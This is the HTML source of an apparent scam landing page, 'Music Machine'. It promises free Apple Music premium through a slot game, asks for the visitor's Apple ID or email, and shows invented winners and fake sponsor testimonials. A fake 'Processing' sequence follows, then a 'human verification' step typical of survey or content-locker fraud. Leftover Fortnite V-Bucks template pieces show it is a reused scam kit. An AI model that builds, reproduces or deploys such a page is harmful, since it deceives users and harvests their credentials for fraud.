<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Music Machine - Win Apple Music Subscription, 100% free to play</title>
    <meta name="description" content="You just need to play Music Machine and you can win up to 12 months of free apple music " />
    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
    <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
    <link href="mdb.min.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="reset.css">
    <link rel="stylesheet" type="text/css" href="slick.css" />
    <link href="css.css" rel="stylesheet">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js"></script>
    <script type="text/javascript" src="slick.js"></script>
    <script src="jquery.jrumble.1.3.min.js"></script>
    <script src="jquery.vibrate.min.js"></script>
    <script src="ion.sound.min.js"></script>
    <script src="vbm.js"></script>
    <script>
        var Lang = "en";
        var LangName = "English";

    </script>
    <script src="decode.js"></script>
    <script>
        var tag = document.createElement('script');
        tag.src = "https://www.youtube.com/player_api";
        var firstScriptTag = document.getElementsByTagName('script')[0];
        firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

    </script>

</head>

<body>

    <div id="MAIN" class="container-fluid">
        <div class="MasterContainer">

            <div class="header">
                <div class="row">
                    <div class="col-lg-12 logo">
                        <img src="images/logo.png" />
                    </div>
                </div>


                <div class="overLayvbmachine">
                    <div class="vbmachine">
                        <div class="topbar">
                            <div class="left">
                                <div class="s1"></div>
                                <div class="s2"></div>
                            </div>
                            <div class="right">
                                <div class="s1"></div>
                                <div class="s2"></div>
                            </div>
                            <div class="clearfix"></div>
                        </div>
                        <div class="centerMain">
                            <div class="squares" id="ezslots">
                                <div class="x1"></div>
                                <div class="x2"></div>
                                <div class="x3"></div>
                            </div>
                        </div>
                        <div class="bottom">
                            <div class="left" id="playVb" disablePlayTxt="To start playing, you need to type in your email address">Play</div>
                            <div class="center">
                                <div class="title">Attempts</div>
                                <div class="tries"><span class="total"></span>/<span class="max"></span></div>
                            </div>
                            <div class="right OpenShowInfoBoard">+ info</div>
                        </div>
                        <div id="vibrate"></div>
                    </div>
                </div>

                <div class="welcomeArea">
                    <div class="vbvideo">
                        <div class="vbwrapper">
                            <iframe onclick='ttrack("MainVideoPlay","clicked");' width="560" height="315" src="https://www.youtube.com/embed/x8xWa0y1WMI?modestbranding=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                        </div>
                    </div>
                </div>

            </div>


            <div class="row mainTitleBox">
                <div class="col-lg-12">
                    <div class="mainTitle">
                        <div class="s1">PLAY AND WIN</div>
                        <div class="s2">SEE HOW EASY IT IS</div>
                    </div>
                </div>
            </div>



            <div class="main-boxes">

                <div class="slider" target=".boxes" counter=".slider_presets" pleft=".left_pointer" pright=".right_pointer">
                    <div class="left_pointer"></div>
                    <div class="right_pointer"></div>

                    <div class="slick-slider slider-boxes">
                        <div class="boxes">
                            <span class="step s1">1</span>
                            <div class="box box-1">
                                <div class="title"> CLICK <br> <span>TO START</span></div>
                                <img src="images/step1.png" />
                                <div class="description">
                                    Click the 'Play' button, insert your email address, good luck!
                                </div>
                            </div>
                        </div>



                        <div class="boxes">
                            <span class="step s2">2</span>
                            <div class="box box-2">
                                <div class="title">PLAY and WIN</div>
                                <img src="images/vgame.png" />
                                <div class="description">

                                    Now you just need to play and if you get 3 of the same Apple music subscription month
                                    you WIN! Thats right and the best is, you can win up to 12 months of free apple music

                                </div>
                            </div>
                        </div>



                        <div class="boxes">
                            <span class="step s3">3</span>
                            <div class="box box-3">
                                <div class="title">FAST <br> <span>and FREE</span></div>
                                <img src="images/surprise.png" style="max-height:100px;" />
                                <div class="description">

                                    YEEES!! After you play and win, your apple music premium will added to your account

                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="clearfix"></div>

                <div class="video_box">
                    <div class="video_box_area">
                        <img src="images/ff_video.png" class="video_img" />
                        <div class="video_player">
                            <iframe width="100%" height="100%" src="https://www.youtube.com/embed/x8xWa0y1WMI?modestbranding=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                        </div>
                    </div>
                </div>


                <div class="description_box">
                    <img src="images/start_banner.png" />
                    <div class="text">
                        <span>Music Machine</span>
                        <br>
                        <div>
                            The Music Machine will allow you to win up to 12 months of free apple music. No tricks, completely for free.
                            This wouldn't be possible without our sponsors and we would like to thank them!
                            This is a limited campaign. What are you waiting for? Play and win!
                        </div>
                    </div>
                </div>


                <div class="testimonials_box">

                    <div class="left_pointer"></div>
                    <div class="right_pointer"></div>

                    <div class="title">
                        <img src="images/testmonials_bar.png" />
                        <h2><span class="color">What <span class="big">Sponsors</span></span> <span class="big">say</span>...</h2><img src="images/testmonials_bar.png" />
                    </div>

                    <div class="slider-boxes tt-boxes">
                        <div class="tt-box">
                            <div class="thumb">
                                <img src="images/ninja_pic.png">
                            </div>
                            <div class="name">
                                <span>#</span>Postmates
                            </div>
                            <div class="text">
                                “We are delighted to sponsor this campaign and be part of this awesome community.”
                            </div>
                        </div>


                        <div class="tt-box">
                            <div class="thumb">
                                <img src="images/drake_pic.png">
                            </div>
                            <div class="name">
                                <span>#</span>Sam's CLub
                            </div>
                            <div class="text">
                                “These free subscription will help alot of users that can't afford it at the moment.”
                            </div>
                        </div>

                        <div class="tt-box">
                            <div class="thumb">
                                <img src="images/myth_pic.png">
                            </div>
                            <div class="name">
                                <span>#</span>CyberGhost VPN
                            </div>
                            <div class="text">
                                “We are honored to participate and help everyone.”
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="subf">
            <img class="bottomIMG" src="images/bottom_image.png">
        </div>
        <div class="footer">
            <div class="social">
                <a href="https://www.facebook.com/apple" target="_blank"><img src="images/fb_icon.png"></a>
                <a href="https://www.youtube.com/apple" target="_blank"><img src="images/youtube.png"></a>
                <a href="https://twitter.com/apple" target="_blank"><img src="images/twitter.png"></a>
            </div>

            <div class="copy"> © 2019, Music Machine </div>
        </div>

        <div class="playnowarea" style="display: block; bottom: 0px;">
            <div class="btnPlayNow btnPlayNowAnimation"><span class="t"></span><span>Play</span>
                <div class="pointer"></div>
            </div>
        </div>

        <div class="playnowbar"></div>

    </div>

    <div class="overLayBoards">

        <div class="ShowInfoBoard">
            <div class="closeBox"></div>
            <div class="clearfix"></div>

            <div class="bbtitle">WATCH THE VIDEO</div>
            <div class="bbvideo">
                <iframe width="100%" onclick='ttrack("CommentsVideoPlay","clicked");' height="100%" src="https://www.youtube.com/embed/x8xWa0y1WMI?modestbranding=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
            </div>
            <div class="bbtitle">WINNERS</div>
            <div class="bblastactivity">
                <div class="bbbox">
                    <div class="bbavatar"><img src="https://cdn.thetrackernetwork.com/cdn/fortnite/006A6012_small.png" /></div>
                    <div class="bbuser"><span>#</span>Derek</div>
                    <div class="bbvbucks">12 Months Premium<span></span></div>
                    <div class="bbtime">54 minutes ago</div>
                </div>

                <div class="bbbox">
                    <div class="bbavatar"><img src="https://cdn.thetrackernetwork.com/cdn/fortnite/006A6012_small.png" /></div>
                    <div class="bbuser"><span>#</span>Alexa B.</div>
                    <div class="bbvbucks">12 Months Premium<span></span></div>
                    <div class="bbtime">54 minutes ago</div>
                </div>

                <div class="bbbox">
                    <div class="bbavatar"><img src="https://cdn.thetrackernetwork.com/cdn/fortnite/006A6012_small.png" /></div>
                    <div class="bbuser"><span>#</span>Notmaj1n</div>
                    <div class="bbvbucks">3 Months Premium<span></span></div>
                    <div class="bbtime">54 minutes ago</div>
                </div>

                <div class="bbbox">
                    <div class="bbavatar"><img src="https://cdn.thetrackernetwork.com/cdn/fortnite/006A6012_small.png" /></div>
                    <div class="bbuser"><span>#</span>Carlos</div>
                    <div class="bbvbucks">6 Months Premium<span></span></div>
                    <div class="bbtime">54 minutes ago</div>
                </div>
            </div>
            <div class="bbtitle">ONLINE COMMENTS</div>
            <div class="bbcomments">
                <div class="bbaddcomment">
                    <div class="sAvatar">
                        <img />
                        <span></span>
                    </div>
                    <div class="closeComment"></div>
                    <textarea id="commentText" placeholder="Type your comment..."></textarea>
                    <div class="clearfix"></div>
                    <div class="btnSendComment" errorTxt="Type your comment before send">Send</div>
                </div>
                <div class="bbcomments-area">

                </div>
            </div>
            <div align="center">
                <div class="btnCreateComment" nologintxt="You need to type a comment before sending it">Create comment</div>
            </div>
        </div>

        <div class="ShowSuccessBox">
            <div class="bbvc">
                <img src="images/abobicon.png" />
            </div>
            <div class="ccontent">
                <div class="title">Apple Music Premium Added</div>
                <div class="text">
                    <div align="center"><span class'vb'></span> Apple Music Premium was successfully scheduled to be added to your account.</div>
                </div>

                <ul class="todoL">
                    <li>
                        <span>1</span> Restart your apple music app
                    </li>
                    <li>
                        <span>2</span> You will see that your account has turned into premium
                    </li>
                </ul>

            </div>
        </div>

        <div class="ShowAtivationBoard">
            <div class="bbvc">
                <img src="images/activation_icon.png" />
            </div>
            <div class="ccontent">
                <div class="title">ACTIVATION</div>
                <div class="text">
                    <div align="center">

                        Activation is necessary for your <span class="vb"></span> Apple Music Premium
                        to be added to your account, you just need to prove that you are human
                        from one of our Antibot Partners
                    </div>
                </div>

                <div class="Smalltitle">TAP BUTTON BELLOW TO VERIFY</div>

                <center>
                    <div class="btnVerifyJS">Verify Now!</div>
                </center>

            </div>
        </div>


        <div id="ShowWinBoard">
            <div class="vbicons">
                <div class="v1">
                    <img src="https://cdn.thetrackernetwork.com/cdn/fortnite/CBFB1183_small.png" />
                </div>
                <div class="v2"></div>
            </div>
            <div class="ccontent">
                <div class="bigtitle">
                    NICE! YOU DID IT!
                </div>
                <div class="vbtotal">0</div>
                <div class="smalltitle">
                    Months Apple Music Premium
                </div>
                <div class="actbtns">
                    <div class="btnBack">TRY AGAIN</div>
                    <div class="btnDeposit">DEPOSIT</div>
                </div>
            </div>
        </div>
        <div class="stars"></div>

        <div id="ProcessingVBs">
            <div class="topimg">
                <img src="images/topfortnite.png" />
            </div>
            <div class="ccontent">

                <div class="title" txt1="Synchronizing Data..." txt2="Connecting to Apple network..." txt3="Processing..." txt4="Apple Music Premium ACTIVATION...">
                </div>
                <div class="avatar">
                    <img src="https://cdn.thetrackernetwork.com/cdn/fortnite/CBFB1183_small.png" />
                    <div class="x1"></div>
                    <div class="x2"></div>
                    <div class="x3"></div>
                </div>
                <div class="username"> #Patrick</div>

                <div class="vbcounter">12 months</div>
            </div>
        </div>

        <div id="ShowLogin">
            <div class="firstPart">
                <div class="title">
                    USERNAME
                </div>
                <div class="text">
                    Enter your Apple ID / Email<br>to participate
                </div>

                <input class="usernameInput" name="usernameInput" />
                <div class="clearfix"></div>
                <div class="error" errorTxt=" An error occurred, wait a moment and try again...">
                </div>
                <div class="btnLogin" errorTxt="Hmmm invalid email!">NEXT</div>
            </div>
            <div class="SearchingPart">
                <div class="title">
                    SEARCHING...
                </div>
                <div class="searchPlayer">
                    <span></span>
                    <img src="images/search.png" class="SearchIMGaction" />
                </div>
            </div>

            <div class="UserNotFoundBox">
                <div class="title">
                    Enter your correct apple id
                </div>
                <div class="content">
                    <br>
                </div>
                <div class="actbtns">
                    <div class="btnBack">BACK</div>
                    <div class="btnContinue">CONTINUE</div>
                </div>
            </div>
        </div>



        <div id="UserFoundBOX">
            <div class="avatar">
            </div>
            <div class="boxcontainer">
                <div class="username">
                </div>
                <div class="platforms">
                </div>

                <div class="actbtns">
                    <div class="btnBack">CHANGE</div>
                    <div class="btnContinue">CONFIRM</div>
                    <div class="clearfix"></div>
                </div>
            </div>
            <div class="clearfix"></div>
        </div>



        <div id="ReadyToPlayBOX">
            <div class="maincontent">
                <div class="icon">
                    <img src="images/valid.png" />
                </div>
                <div class="title">
                    YOU'RE READY
                </div>
                <div class="content">
                    It's easy to play, you have 5 attempts, you just need to click on 'Play' to spin your luck! If you get 3 of the same subscription months you WIN! Thats right and the best is, you can win up to 12 months of apple music subscription
                </div>
                <div class="btnOK">
                    Play
                </div>
            </div>
        </div>

    </div>



    <div class="overLayShareActivation">

        <div class="top">
            <div class="content">
                <div class="playerBox">
                    <div class="avatar">
                        <img src="https://cdn.thetrackernetwork.com/cdn/fortnite/006A6012_small.png" />
                    </div>
                    <div class="username">
                        <span>#</span>Xploitz
                    </div>
                    <div class="totalVbs">
                        <img src="images/vbsicons.png" />
                        <div class="layer">
                            <div class="vbs">$100</div>
                            <div class="vbs_title">PSN Card</div>
                        </div>
                    </div>
                </div>
            </div>
            <img src="images/first_step.png" class="stepIcon" />
        </div>
    </div>


    <div class="topIconVideoPlayer">
        <img src="images/playIcon.png" class="OpenShowInfoBoard" />
    </div>

    <div id="preload">
        <img src="images/vbmachine/left_btn_hover.png" width="1" height="1" />
        <img src="images/top_background_activated.png" width="1" height="1" />
    </div>

</body>

</html>
